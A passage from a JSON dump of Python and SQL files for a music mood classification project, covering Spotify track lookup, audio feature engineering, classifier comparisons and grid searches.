forest.estimators_], axis=0)\nindices = np.argsort(importances)[::-1]\n\nfeatures_neworder = [features[i] for i in indices]\n\nprint features_neworder\nprint (\"Feature ranking:\")\n\nfor f in range(X.shape[1]):\n print (\"%d. feature %d %s (%f)\" % (f + 1, indices[f], features[indices[f]], importances[indices[f]]))\n\nplt.figure()\nplt.title(\"Feature importance\")\nplt.bar(range(X.shape[1]), importances[indices], color=\"b\", yerr=std[indices], align=\"center\")\nplt.xticks(range(X.shape[1]), features_neworder)\nplt.xlim([-1, X.shape[1]])\nplt.show()\n\n\n\n" }, { "alpha_fraction": 0.5654545426368713, "alphanum_fraction": 0.5690909028053284, "avg_line_length": 32, "blob_id": "db60cac4f9ceb7a6e17faa90a3414926c2296805", "content_id": "720736cee596fab83c5ec95d95544561b5f72415", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1650, "license_type": "no_license", "max_line_length": 113, "num_lines": 50, "path": "/src/spotify.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import spotipy\nimport pprint\nimport csv\nfrom time import time\nimport pandas as pd\nimport subprocess\nimport requests\nimport sys\n\n# songs_A = pd.read_pickle('../temp/songs_A.pkl')\n# songs_B = pd.read_pickle('../temp/songs_B.pkl')\n#\n#\n# all_songs = pd.concat([songs_A, songs_B])\n#\n# all_songs[['File', 'Artist', 'Title']].to_csv('../data/pending_trackids2.csv', sep=';')\n#\n# print \"pending_trackids2.csv created.\"\n\nspotify = spotipy.Spotify()\n\n\nstart = time()\n\nwith open('../data/pending_trackids2.csv') as f:\n with open('../data/trackids_new.csv', 'w') as out:\n reader = csv.DictReader(f, fieldnames=['No', 'File', 'Artist', 'Title'], delimiter=';')\n for row in reader:\n print(row['Artist'], row['Title'])\n try:\n results = spotify.search(q='artist:'+row['Artist']+' track:'+row['Title'], type='track', limit=3)\n trackid = str(results['tracks']['items'][0]['id'])\n out.write(row['File'] + \";\" + 
row['Artist'] + \";\" + row['Title'] + \";\" + trackid + '\\n')\n except IndexError:\n out.write(row['File'] + \";\" + row['Artist'] + \";\" + row['Title'] + \";\" + \"Not Found\" + '\\n')\n except requests.exceptions.HTTPError as err:\n print err\n sys.exit(1)\n except requests.ConnectionError as err:\n print err\n except spotipy.client.SpotifyException as sp:\n print sp\n f.close()\n out.close()\n\nprint \"Elapsed time: \", time() - start\n\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7126436829566956, "alphanum_fraction": 0.7126436829566956, "avg_line_length": 27.66666603088379, "blob_id": "48f9f1151e6ffb8ade4ce7fb01e4bd7035171dc2", "content_id": "3cd355d474289818ec75ad2cbce1ebbdbf4af5ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 87, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/explore/getting_labels.sql", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "select d.Track, d.Mood, s.* from dataset d\ninner join subset s\nwhere s.File = d.Track\n\n" }, { "alpha_fraction": 0.6483610272407532, "alphanum_fraction": 0.6598552465438843, "avg_line_length": 29.705883026123047, "blob_id": "343822be0c4c36952a6ae6418461773ba1b798a0", "content_id": "c603ab72a15463b50f4a40dc513d38ec6a7ae4f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4698, "license_type": "no_license", "max_line_length": 110, "num_lines": 153, "path": "/src/create_dataset.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\n\nnumerical = ['Tempo', 'Loudness', 'Energy', 'Speechiness', 'Danceability', 'Acousticness', 'Instrumentalness']\n\ntrackids = pd.read_csv('../data/trackids.csv', sep=';')\nfeatures = pd.read_csv('../data/features.csv', sep=';')\nsubset = pd.read_pickle('../data/subset.pkl')\nlabels = pd.read_csv('../data/labels.csv', sep=';')\n\nmaster = pd.merge(subset, trackids, on='File', how='inner')\nmaster = pd.merge(master, features, on='TrackID', how='inner')\nmaster = pd.merge(master, labels, on='File', how='inner')\nmaster = master.rename(index=str, columns={\"Artist_x\": \"Artist\", \"Title_x\": \"Title\"})\n\n\ntrackids_2 = pd.read_csv('../data/trackids_new_2.csv', sep=';')\nfeatures_2 = pd.read_csv('../data/features_2.csv', sep=';')\nsubset_2 = pd.read_pickle('../data/newsubset.pkl')\n\nd = pd.merge(subset_2, trackids_2, on='File', how='inner')\nd = pd.merge(d, features_2, on='TrackID', how='inner')\n\nd = d.rename(index=str, columns={\"Artist_x\": \"Artist\", \"Title_x\": \"Title\"})\nmaster = pd.concat([master, d])\nmaster = master.drop_duplicates(subset=['File', 'Artist', 'Title'], keep='first')\n\nmaster['KeyMode'] = master['Key'] * master['Mode']\nmaster['LoudnessSq'] = master['Loudness'] * master['Loudness']\nmaster['TempoMode'] = master['Tempo'] * master['Mode']\n\n\n# Impute missing values\nmaster['Energy'].fillna(master['Energy'].mean(), inplace=True)\nmaster['Danceability'].fillna(master['Danceability'].mean(), inplace=True)\nmaster['Acousticness'].fillna(master['Acousticness'].mean(), inplace=True)\nmaster['Valence'].fillna(master['Valence'].mean(), inplace=True)\nmaster['Instrumentalness'].fillna(master['Instrumentalness'].mean(), inplace=True)\nmaster['Speechiness'].fillna(master['Speechiness'].mean(), inplace=True)\n\n\n\n# Create segment 
features\n\ndef get_shape(x):\n return x.shape[0]\n\n\n# timbre features of shape (1, 90)\ndef compute_timbre_feature(x):\n features = x.T\n x = features.shape[1]\n y = features.shape[0]\n assert y == 12, \"Transpose error - wrong dimension\"\n #finaldim = 90\n if x < 3:\n print \"flen < 3\"\n return None\n avg = np.average(features, 1)\n cov = np.cov(features)\n covflat = []\n for k in range(12):\n covflat.extend(np.diag(cov, k))\n covflat = np.array(covflat, dtype=object)\n # concatenate avg and cov\n f = np.concatenate([avg, covflat])\n f = list(f)\n return f\n\n\n# pitch average feature vector of size (1, 12)\ndef compute_pitch_feature(x):\n features = x.T\n x = features.shape[1]\n y = features.shape[0]\n assert y == 12, \"Transpose error - wrong dimension\"\n if x < 3:\n print \"flen < 3\"\n return None\n avg = np.average(features, 1)\n f = list([avg])\n return avg\n\n\n# timbre average feature vector of size(1, 12)\ndef compute_timbre_average(x):\n features = x.T\n flen = features.shape[1]\n ndim = features.shape[0]\n assert ndim == 12, \"Transpose error - wrong dimension\"\n finaldim = 90\n if flen < 3:\n print \"flen < 3\"\n return None\n avg = np.average(features, 1)\n return avg\n\n\nmaster['TimbreVector'] = master['Timbre'].apply(lambda x: compute_timbre_feature(x))\nmaster['PitchVector'] = master['Pitches'].apply(lambda x: compute_pitch_feature(x))\nmaster['TimbreAverage'] = master['Timbre'].apply(lambda x: compute_timbre_average(x))\n\n\ntimbrevec = master['TimbreVector'].apply(pd.Series)\ntimbrevec = timbrevec.rename(columns = lambda x: 'tim_'+str(x))\nmaster = pd.concat([master[:], timbrevec[:]], axis=1)\n\ntimbreavg = master['TimbreAverage'].apply(pd.Series)\ntimbreavg = timbreavg.rename(columns= lambda x: 'timavg_'+str(x))\nmaster = pd.concat([master[:], timbreavg[:]], axis=1)\n\npitchvec = master['PitchVector'].apply(pd.Series)\npitchvec = pitchvec.rename(columns = lambda x: 'pitch_'+str(x))\nmaster = pd.concat([master[:], pitchvec[:]], axis=1)\n\n\nmaster['Beats'] = master['BeatsConfidence'].apply(lambda x: get_shape(x))\n\n# Echonest Analyse Docs\n# AvgLoudnessTimbre' - timavg_1\n# AvgBrightnessTimbre' - timavg_2\n# AvgFlatnessTimbre'- timavg_3'\n# AvgAttackTimbre' - timavg_4'\n\n\nmaster.to_pickle('../data/fullset.pkl')\nmaster.to_csv('../data/fullset.csv')\n\n# Create train and test sets\n\ndata = pd.read_pickle('../data/fullset.pkl')\n\n# Partition dataset to get a train and test set\n# track_info = data[['File', 'Artist', 'Title']]\n# track_info.to_csv('../data/tracks.csv', sep=';')\n\nmask = np.random.rand(len(data)) < 0.6\n\ntrain = data[mask]\ntest = data[~mask]\n\nprint \"Train--------\"\nhappy_train = train['Mood'] == 'happy'\nprint happy_train.value_counts()\n\nprint \"Test----------\"\nhappy_test = test['Mood'] == 'happy'\nprint happy_test.value_counts()\n\n\ntrain.to_pickle('../data/train.pkl')\ntest.to_pickle('../data/test.pkl')\n" }, { "alpha_fraction": 0.6379605531692505, "alphanum_fraction": 0.6529563069343567, "avg_line_length": 38.50847625732422, "blob_id": "19f9bd5d5794f0a531d5579ffbf42c3f25fc0293", "content_id": "361816e8ff7b32ab31b3d7d9ac36fdcf04c1381a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2334, "license_type": "no_license", "max_line_length": 116, "num_lines": 59, "path": "/src/feature_combinations.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom get_train_test import train\nfrom sklearn.ensemble import 
ExtraTreesClassifier\nimport matplotlib.pyplot as plt\nfrom time import time\n\ntimbre_avg = [col for col in list(train.columns.values) if col.startswith('timavg_')]\ntimbre = [col for col in list(train.columns.values) if col.startswith('tim_')]\npitch_col = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ndesc_features = ['Energy', 'Tempo', 'LoudnessSq', 'Acousticness', 'Instrumentalness', 'Speechiness', 'Danceability']\nnotational_features = ['Mode', 'KeyMode', 'TimeSignature', 'TempoMode', 'Beats']\ntop_4_timbre = ['timavg_1', 'timavg_2', 'timavg_3', 'timavg_4']\n\ncomb1 = pitch_col + desc_features + notational_features\ncomb2 = top_4_timbre + desc_features\ncomb3 = desc_features + notational_features\ncomb4 = pitch_col + top_4_timbre + desc_features\ncomb5 = desc_features\n\ncombinations = [comb1, comb2, comb3, comb4, comb5]\n\ncombination_desc = [\"Combination 1 - top 4 timbres, pitch averages, desc and notational features\",\n                    \"Combination 2 - Top 4 timbres and Desc features\",\n                    \"Combination 3 - Notational features & Desc features\",\n                    \"Combination 4 - Pitch, Timbre and Desc\",\n                    \"Combination 5 - Desc features only\"]\n\n\nfor idx, c in enumerate(combinations):\n    X = train[c]\n    y = train['Mood']\n\n    forest = ExtraTreesClassifier(n_estimators=250)\n    forest.fit(X,y)\n\n    importances = forest.feature_importances_\n    std = np.std([tree.feature_importances_ for tree in forest.estimators_], axis=0)\n    indices = np.argsort(importances)[::-1]\n\n    features_neworder = [c[i] for i in indices]\n\n    print combination_desc[idx]\n    print features_neworder\n    print (\"Feature ranking:\")\n\n    for f in range(X.shape[1]):\n        print (\"%d. feature %d %s (%f)\" % (f + 1, indices[f], c[indices[f]], importances[indices[f]]))\n\n    plt.figure()\n    plt.title(\"Feature importance\")\n    plt.bar(range(X.shape[1]), importances[indices], color=\"b\", yerr=std[indices], align=\"center\")\n    plt.xticks(range(X.shape[1]), features_neworder)\n    plt.xlim([-1, X.shape[1]])\n    filename = '../explore/combination_{}_features.png'.format(idx)\n    plt.savefig(filename)\n\n\nprint \" -------------------------------------------------------------------\"\n\n\n\n" }, { "alpha_fraction": 0.6972347497940063, "alphanum_fraction": 0.7054662108421326, "avg_line_length": 35.3317756652832, "blob_id": "74642974842460fc3b4aae958f377452284b8296", "content_id": "6a8c957f85742003cd4cace85abc97068ba4b928", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7775, "license_type": "no_license", "max_line_length": 147, "num_lines": 214, "path": "/src/models.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier, ExtraTreesClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, accuracy_score\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom time import time\nimport subprocess\n\nstart = time()\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n                 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in 
list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\nprint features\n\nX = train[features]\ny = train['Mood']\n\n\nX_qual = train[qual_features]\nX_audio = train[audio_features]\n\n\n#ensemble models\n\nmodels = {}\n\n\nprint \"Training on all features\"\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1010)\n\n\nmodels['RFC'] = RandomForestClassifier(n_estimators=300)\nmodels['XGB'] = xgb.XGBClassifier(max_depth=3, n_estimators=300, learning_rate=0.05)\nmodels['GBC'] = GradientBoostingClassifier()\nmodels['ABC'] = AdaBoostClassifier()\nmodels['ETC'] = ExtraTreesClassifier()\n\n\nfor name, model in models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\n\nfeature_importances = pd.DataFrame()\n\nfor name, model in models.iteritems():\n df = pd.DataFrame(data = model.feature_importances_, index = X_test.columns, columns = [name]).transpose()\n feature_importances = feature_importances.append(df)\n\nfeature_importances = feature_importances.transpose()\nfeature_importances['average'] = (feature_importances['RFC'] + feature_importances['XGB'] + feature_importances['GBC'] + feature_importances['ABC']\n + feature_importances['ETC'])/5\n\nfeature_importances = feature_importances.sort_values('average', ascending = False).drop('average', axis=1)\n\n\nfig, axes = plt.subplots(figsize=(18,12))\nsns.set(rc={'axes.facecolor':'black', 'figure.facecolor':'black', 'axes.grid' : False, 'text.color': 'white',\n 'xtick.color': 'white', 'ytick.color': 'white', 'axes.labelcolor': 'white', 'axes.edgecolor': 'white'} )\nplt.xlabel('Models')\nplt.ylabel('Features')\nplt.title('Feature Importance by Estimator')\nheatmap = sns.heatmap(feature_importances, cmap = 'YlGnBu', cbar=False, annot=True)\nheatmap.set_yticklabels(heatmap.get_yticklabels(), rotation=0)\nheatmap.set(xlabel='Estimators', ylabel='Features')\nplt.savefig('../explore/feature_imp_all.png', dpi=300)\nplt.show()\n\n\n# other models\nsimple_models = {}\nsimple_models['SVM'] = SVC(kernel='linear')\nsimple_models['KNN'] = KNeighborsClassifier()\nsimple_models['NB'] = GaussianNB()\n\nfor name, model in simple_models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\nprint \"Elapsed time: \", time() - start\n\n\nprint \"Training on audio features only\"\n\nX_train, X_test, y_train, y_test = train_test_split(X_audio, y, test_size=0.3, random_state=1010)\n\n\nfor name, model in models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\n\nfeature_importances = pd.DataFrame()\n\nfor name, model in models.iteritems():\n df = pd.DataFrame(data = model.feature_importances_, index = X_test.columns, columns = [name]).transpose()\n feature_importances = feature_importances.append(df)\n\nfeature_importances = feature_importances.transpose()\nfeature_importances['average'] = (feature_importances['RFC'] + feature_importances['XGB'] + feature_importances['GBC'] + feature_importances['ABC']\n + feature_importances['ETC'])/5\n\nfeature_importances = feature_importances.sort_values('average', 
ascending = False).drop('average', axis=1)\n\n\nfig, axes = plt.subplots(figsize=(18, 12))\nsns.set(rc={'axes.facecolor':'black', 'figure.facecolor':'black', 'axes.grid' : False, 'text.color': 'white',\n 'xtick.color': 'white', 'ytick.color': 'white', 'axes.labelcolor': 'white', 'axes.edgecolor': 'white'} )\nplt.xlabel('Models')\nplt.ylabel('Features')\nheatmap = sns.heatmap(feature_importances, cmap = 'YlGnBu', cbar=False, annot=True)\nheatmap.set_yticklabels(heatmap.get_yticklabels(), rotation=0)\nheatmap.set(xlabel='Estimators', ylabel='Features')\nplt.savefig('../explore/feature_imp_audio.png', dpi=300)\nplt.show()\n\n# other models\nsimple_models = {}\nsimple_models['SVM'] = SVC(kernel='linear')\nsimple_models['KNN'] = KNeighborsClassifier()\nsimple_models['NB'] = GaussianNB()\n\nfor name, model in simple_models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\nprint \"Elapsed time: \", time() - start\n\n\nprint \"Training on qual features only\"\n\nX_train, X_test, y_train, y_test = train_test_split(X_qual, y, test_size=0.3, random_state=1010)\n\n\nfor name, model in models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\n\nfeature_importances = pd.DataFrame()\n\nfor name, model in models.iteritems():\n df = pd.DataFrame(data = model.feature_importances_, index = X_test.columns, columns = [name]).transpose()\n feature_importances = feature_importances.append(df)\n\nfeature_importances = feature_importances.transpose()\nfeature_importances['average'] = (feature_importances['RFC'] + feature_importances['XGB'] + feature_importances['GBC'] + feature_importances['ABC']\n + feature_importances['ETC'])/5\n\nfeature_importances = feature_importances.sort_values('average', ascending = False).drop('average', axis=1)\n\n\nfig, axes = plt.subplots(figsize=(18,12))\nsns.set(rc={'axes.facecolor':'black', 'figure.facecolor':'black', 'axes.grid' : False, 'text.color': 'white',\n 'xtick.color': 'white', 'ytick.color': 'white', 'axes.labelcolor': 'white', 'axes.edgecolor': 'white'} )\nplt.xlabel('Models')\nplt.ylabel('Features')\nheatmap = sns.heatmap(feature_importances, cmap = 'YlGnBu', cbar=False, annot=True)\nheatmap.set_yticklabels(heatmap.get_yticklabels(), rotation=0)\nheatmap.set(xlabel='Estimators', ylabel='Features')\nplt.savefig('../explore/feature_imp_qual.png', dpi=300)\nplt.show()\n\n# other models\nsimple_models = {}\nsimple_models['SVM'] = SVC(kernel='linear')\nsimple_models['KNN'] = KNeighborsClassifier(algorithm='auto', leaf_size=30, metric='euclidean',\n metric_params=None, n_jobs=1, n_neighbors=37, p=2,\n weights='uniform')\nsimple_models['NB'] = GaussianNB()\n\nfor name, model in simple_models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\nprint \"Elapsed time: \", time() - start\n\n\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7129008173942566, "alphanum_fraction": 0.7270693778991699, "avg_line_length": 33.38461685180664, "blob_id": "6201a54bf17691921c252d4a6920d7caec1afc54", "content_id": 
"a340899fefecc27335b9e3e0b858f18ce116d1e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 111, "num_lines": 39, "path": "/src/gridsearch_rfc.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\n\nrfc_params = {\"n_estimators\":[300, 500, 700, 1000], \"max_depth\": [7, 12, 15], \"criterion\": ['gini', 'entropy']}\n\nrfc_grid = GridSearchCV(estimator=RandomForestClassifier(), param_grid=rfc_params, scoring=accuracy, cv=5)\nrfc_grid.fit(train[features], train['Mood'])\n\nprint \"RFC grid search: \"\nprint \"CV results\", rfc_grid.cv_results_\nprint \"Best RFC\", rfc_grid.best_estimator_\nprint \"Best CV score for RFC\", rfc_grid.best_score_\nprint \"Best RFC params:\", rfc_grid.best_params_\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.6945578455924988, "alphanum_fraction": 0.7115646004676819, "avg_line_length": 30.84782600402832, "blob_id": "68564b7ac50758ef0a1675e6d030003618c2b10e", "content_id": "228a2457b04afd5b49f67f95aa811976ea6c06a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 104, "num_lines": 46, "path": "/src/gridsearch_knn.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import DistanceMetric\nfrom get_train_test import train\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\n\nX = train[features]\ny = train['Mood']\n\naccuracy = make_scorer(accuracy_score)\n\nstart = time()\n\nknn_params = {\"n_neighbors\": [5, 7, 9, 12, 17, 19, 21, 23, 27, 29, 33, 37], \"p\" : [2, 3, 5],\n \"algorithm\":['auto'], 'metric': ['euclidean']}\n\n\nknn_grid = GridSearchCV(estimator=KNeighborsClassifier(), param_grid=knn_params, scoring=accuracy, cv=5)\nknn_grid.fit(X, y)\n\nprint \"Extra Trees grid search: \"\nprint \"CV results\", knn_grid.cv_results_\nprint \"Best Extra Trees\", knn_grid.best_estimator_\nprint \"Best CV score for Extra Trees\", knn_grid.best_score_\nprint \"Best Extra Trees params:\", 
knn_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n\n\n\n\n\n" }, { "alpha_fraction": 0.7118279337882996, "alphanum_fraction": 0.7118279337882996, "avg_line_length": 23.473684310913086, "blob_id": "f2924e9d82c0db60a2cb170c2aff6ea571ff9733", "content_id": "2a6b9f6c7f39288a07bcca8f32506545cffe019f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 48, "num_lines": 19, "path": "/src/get_train_test.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nfrom ast import literal_eval\nfrom sklearn.preprocessing import StandardScaler\n\n\ntrain = pd.read_pickle('../data/train.pkl')\ntest = pd.read_pickle('../data/test.pkl')\n\n\nprint \"Train--------\"\nhappy_train = train['Mood'] == 'happy'\nprint happy_train.value_counts()\n\nprint \"Test----------\"\nhappy_test = test['Mood'] == 'happy'\nprint happy_test.value_counts()\n" } ]
23
PierPP/volumio-radio-stations
https://github.com/PierPP/volumio-radio-stations
88693c6ef60ee2c134c08cd50fac6ba5fe61b2c2
d216d2f9956ac7bbced4811961081f78a1cba55c
4a1648b8287f4203e5dcd9b982828fc90d7b2edc
refs/heads/master
2021-01-20T02:53:05.884503
2017-08-24T21:42:38
2017-08-24T21:42:38
101,339,309
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7349823117256165, "alphanum_fraction": 0.7349823117256165, "avg_line_length": 20.769229888916016, "blob_id": "6b8a6a1b164e94d2fb91b2f0d03ada83ca94a295", "content_id": "3d6bb03c73fe8e335e9702be54fa7ce7d0718929", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 283, "license_type": "permissive", "max_line_length": 90, "num_lines": 13, "path": "/README.md", "repo_name": "PierPP/volumio-radio-stations", "src_encoding": "UTF-8", "text": "# volumio-radio-stations\n\n## for the impatient\n\nJust copy *my-web-radio* to /data/favourites/\n\n## what's converte.py? \n\nTo convert .pls files to the json format used by Volumio\n\n## why that?\n\nBecouse Tim (Moodeaudio) did a fantastic work with those and I wanted them in volumio too!\n" }, { "alpha_fraction": 0.6188924908638, "alphanum_fraction": 0.6340934038162231, "avg_line_length": 26.84848403930664, "blob_id": "7539f37756054480c9698f86bd8c0a70c380cbb9", "content_id": "7e6c1232801b387f5b61fb72a2dce1c29919c358", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 921, "license_type": "permissive", "max_line_length": 103, "num_lines": 33, "path": "/converte.py", "repo_name": "PierPP/volumio-radio-stations", "src_encoding": "UTF-8", "text": "import ConfigParser\nimport os\n\nprint \"[\"\n\ndef PrintEntry(thisfile):\n String1 = \"\"\n Config = ConfigParser.ConfigParser()\n Config.read(thisfile)\n url=ConfigSectionMap(Config,\"playlist\")['file1']\n name=ConfigSectionMap(Config,\"playlist\")['title1']\n ## {\"service\":\"webradio\",\"name\":\"SomaFM: Groove Salad\",\"uri\":\"http://somafm.com/groovesalad256.pls\"},\n String1 = '{\"service\":\"webradio\",\"name\":\"%s\",\"uri\":\"%s\"},' % (name,url)\n return String1\n\ndef ConfigSectionMap(Config,section):\n dict1 = {}\n options = Config.options(section)\n for option in options:\n try:\n dict1[option] = Config.get(section, option)\n #if dict1[option] == -1:\n # DebugPrint(\"skip: %s\" % option)\n except:\n print(\"exception on %s!\" % option)\n dict1[option] = None\n return dict1\n\nfor filename in os.listdir('.'):\n if filename.endswith(\".pls\"):\n print PrintEntry(filename)\n\nprint \"]\"\n\n\n" } ]
2
wangsamas/Odoo-default-note-on-invoice
https://github.com/wangsamas/Odoo-default-note-on-invoice
ba35413e26ba3c170ab4e5d8a5e1d9dbc4ad192f
e0ca7210df79dd0521b3e4b196eabe3d4082ecb9
f115e5ef96cc6930b711bf6f796bbf630f43c279
refs/heads/master
2020-03-24T20:19:50.811830
2018-07-31T06:36:55
2018-07-31T06:36:55
142,972,039
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8239436745643616, "alphanum_fraction": 0.8239436745643616, "avg_line_length": 70, "blob_id": "8831322fe5cd5831004259ea13c886115ae44adf", "content_id": "9522d1e8585a5c6deef32777c7996b29ba6f2a97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "no_license", "max_line_length": 110, "num_lines": 2, "path": "/README.md", "repo_name": "wangsamas/Odoo-default-note-on-invoice", "src_encoding": "UTF-8", "text": "# Odoo-default-note-on-invoice\nThis module replace default sale term and condition on invoice with default invoice term and condition in Odoo\n" }, { "alpha_fraction": 0.5600961446762085, "alphanum_fraction": 0.5649038553237915, "avg_line_length": 18.85714340209961, "blob_id": "ea676a316be02c28c688bb78df58083f8a6f7daa", "content_id": "44beb2774d788208140d0f53156bcbf0c1c019cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 416, "license_type": "no_license", "max_line_length": 103, "num_lines": 21, "path": "/invoice_note/__manifest__.py", "repo_name": "wangsamas/Odoo-default-note-on-invoice", "src_encoding": "UTF-8", "text": "{\n 'name': \"invoice_note\",\n\n 'summary': \"\"\"Default note on invoice\"\"\",\n\n 'description': \"\"\"\n\tThis module replace default sale term and condition on invoice with default invoice term and condition\n \"\"\",\n\n 'author': \"Kusuma Ruslan\",\n 'website': \"http://www.wangsamas.com\",\n\n 'category': 'Sale',\n 'version': '0.1',\n\n 'depends': ['sale_management'],\n\n 'data': [\n 'views/views.xml',\n ],\n}" }, { "alpha_fraction": 0.6736488342285156, "alphanum_fraction": 0.6746832132339478, "avg_line_length": 54.97101593017578, "blob_id": "9e32fb9a92d80261ff7369d015627932798be52f", "content_id": "ddec205e826c8e3c3ca3ad358dff2f1a6619ff83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3867, "license_type": "no_license", "max_line_length": 167, "num_lines": 69, "path": "/invoice_note/models/models.py", "repo_name": "wangsamas/Odoo-default-note-on-invoice", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom ast import literal_eval\nfrom odoo import models, fields, api\n\nclass ResCompany(models.Model):\n _inherit = \"res.company\"\n\n inv_note = fields.Text(string='Default Terms and Conditions', translate=True)\n\t\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\t\n inv_note = fields.Text(related='company_id.inv_note', string=\"Terms & Conditions\")\n use_inv_note= fields.Boolean(\n string='Default Invoice Terms & Conditions')\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n ICPSudo = self.env['ir.config_parameter'].sudo()\n sale_pricelist_setting = ICPSudo.get_param('sale.sale_pricelist_setting')\n sale_portal_confirmation_options = ICPSudo.get_param('sale.sale_portal_confirmation_options', default='none')\n default_deposit_product_id = literal_eval(ICPSudo.get_param('sale.default_deposit_product_id', default='False'))\n if default_deposit_product_id and not self.env['product.product'].browse(default_deposit_product_id).exists():\n default_deposit_product_id = False\n res.update(\n auth_signup_uninvited='b2c' if ICPSudo.get_param('auth_signup.allow_uninvited', 'False').lower() == 'true' else 'b2b',\n use_sale_note=ICPSudo.get_param('sale.use_sale_note', 